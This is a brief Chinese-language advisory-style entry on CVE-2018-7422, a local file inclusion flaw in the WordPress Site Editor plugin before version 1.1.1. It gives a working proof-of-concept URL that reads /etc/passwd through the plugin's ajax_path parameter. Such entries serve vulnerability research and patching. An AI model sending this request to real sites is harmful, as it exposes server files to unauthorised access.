WordPress Plugin Site Editor LFI （CVE-2018-7422）

概述

WordPress 插件Site Editor受到本地文件包含 (LFI) 安全漏洞的影响

影响范围

WordPress Plugin Site Editor < 1.1.1

POC

http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd